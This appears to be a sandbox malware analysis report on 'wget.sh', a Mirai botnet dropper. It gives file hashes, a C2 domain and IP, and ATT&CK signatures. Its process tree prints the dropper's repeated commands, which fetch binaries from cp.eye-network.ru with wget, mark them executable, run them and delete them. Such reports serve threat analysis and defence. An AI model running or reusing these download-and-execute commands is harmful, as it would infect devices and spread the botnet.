Analysis
-
max time kernel
10s -
max time network
12s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
19-12-2024 22:06
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
wget.sh
-
Size
809B
-
MD5
1e8348b42b38787c7c1660f00ece290d
-
SHA1
e031daa5ac284dcd2fd0f34f6918b6957efdd3c3
-
SHA256
520ee4f7fba6358cfef4aa216cfe0294fd8b4c28b5b8c0fe6de83b3ca208249a
-
SHA512
634e2e20f250cd47c0df75bcc6b23b150e81585f262f2229890337aab21d6fde56b0a264892ab9a34849e01ad118b8b544a86a5fa1688b23aa10b2d433274a2e
Malware Config
Extracted
mirai
BOTNET
boats.dogmuncher.xyz
89.190.156.145
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 754 chmod 762 chmod 735 chmod 750 chmod 766 chmod 775 chmod 785 chmod 797 chmod 745 chmod 758 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/fnkea7 767 fnkea7 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fnkea7 wget
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵PID:714
-
/usr/bin/wgetwget http://cp.eye-network.ru/wkb862⤵PID:718
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/wkb86./wkb86 telnet2⤵PID:736
-
-
/bin/rmrm -rf wkb862⤵PID:737
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/kqibeps2⤵PID:738
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/kqibeps./kqibeps telnet2⤵PID:746
-
-
/bin/rmrm -rf kqibeps2⤵PID:747
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/bojwsl2⤵PID:748
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/bojwsl./bojwsl telnet2⤵PID:751
-
-
/bin/rmrm -rf bojwsl2⤵PID:752
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/njvwa42⤵PID:753
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/njvwa4./njvwa4 telnet2⤵PID:755
-
-
/bin/rmrm -rf njvwa42⤵PID:756
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/ngwa52⤵PID:757
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/ngwa5./ngwa5 telnet2⤵PID:759
-
-
/bin/rmrm -rf ngwa52⤵PID:760
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/woega62⤵PID:761
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/woega6./woega6 telnet2⤵PID:763
-
-
/bin/rmrm -rf woega62⤵PID:764
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/fnkea72⤵
- Writes file to tmp directory
PID:765
-
-
/bin/chmodchmod +x fnkea7 systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/fnkea7./fnkea7 telnet2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm -rf fnkea72⤵PID:769
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/gnjqwpc2⤵PID:770
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/gnjqwpc./gnjqwpc telnet2⤵PID:776
-
-
/bin/rmrm -rf gnjqwpc2⤵PID:777
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/wlw68k2⤵PID:779
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/wlw68k./wlw68k telnet2⤵PID:786
-
-
/bin/rmrm -rf wlw68k2⤵PID:787
-
-
/usr/bin/wgetwget http://cp.eye-network.ru/wrjkngh42⤵PID:789
-
-
/bin/chmodchmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/wrjkngh4./wrjkngh4 telnet2⤵PID:798
-
-
/bin/rmrm -rf wrjkngh42⤵PID:799
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
209KB
MD54528c59bd04bd8ec4cf3440685a609b9
SHA1895498d902fec75311ab49b7743be541fb7c8bf4
SHA256d8f8048861b5ea3320c47f44dbbc95037148ed46cba648ce6fdb3fd6f0dd0c4d
SHA51289fb3ca4e65c5043544a5584807a1842d3e82e66a1363f650b5e6bd1cf7968a01a4a30d9c1a0120cfccad62fa51949e423af751c9f8a7d1ee8a7e1ec3a4ae571